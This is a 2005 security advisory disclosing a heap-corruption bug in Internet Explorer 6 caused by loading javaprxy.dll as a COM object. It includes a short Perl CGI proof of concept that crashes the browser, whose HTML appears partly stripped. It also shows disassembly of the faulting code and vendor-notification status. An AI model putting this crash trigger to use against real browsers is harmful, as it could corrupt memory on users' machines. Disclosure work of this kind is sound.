SEC-CONSULT Security Advisory < 20050629-0 > ================================================================================== title: IE6 javaprxy.dll COM instantiation heap corruption vulnerability program: Internet Explorer vulnerable version: 6.0.2900.2180 homepage: www.microsoft.com found: 2005-06-17 by: sk0L & Martin Eiszner / SEC-CONSULT / www.sec-consult.com ================================================================================== background: --------------- Internet Explorer supports instantiation of non-ActiveX controls, e.g COM objects, via tags. according to M$, COM components respond gracefully to attempts to treat them as ActiveX controls. on the contrary, we found that at least 20 of the objects available on an average XP system either lead to an instant crash or an exception after a few reloads. vulnerability overview: --------------- Loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE. proof of concept: --------------- this simple CGI should crash IE. --------------- #!/usr/bin/perl # in order for this to work javaprxy.dll must be available on the client. my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll my $html1 = "\n\n"; my $html2 = "\n\n"; print "Content-Type: text/html;\r\n\r\n"; print $html1.("A"x30000).$html2; --------------- on our lab machine, we, end up with eax=00410041, and an exception occurs at the following location in javaprxy.dll: --------------- .text:7C508660 mov eax, [ecx] .text:7C508662 test eax, eax .text:7C508664 jz short locret_7C50866C .text:7C508666 mov ecx, [eax] .text:7C508668 push eax .text:7C508669 call dword ptr [ecx+8] --------------- as you can see, this situation may be exploitable, considering that we have some level of control over eax. vulnerable versions: --------------- javaprxy.dll 5.00.3810 internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 these are the versions tested, other versions may of course be vulnerable. vendor status: --------------- vendor notified: 2005-06-17 vendor response: 2005-06-17 patch available: ? microsoft does not confirm the vulnerability, as their product team can not reproduce condition. however, they are looking at making changes to handle COM objects in a more robust manner in the future. UPDATE (2005-06-30): we have been informed that microsoft now confirms the issue, as it has been successfully reproduced with the version numbers listed above. they are currently working on a bug fix. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ < Bernhard Müller / Martin Eiszner > / www.sec-consult.com / SGT ::: walter|bruder, flo, tke, dfa :::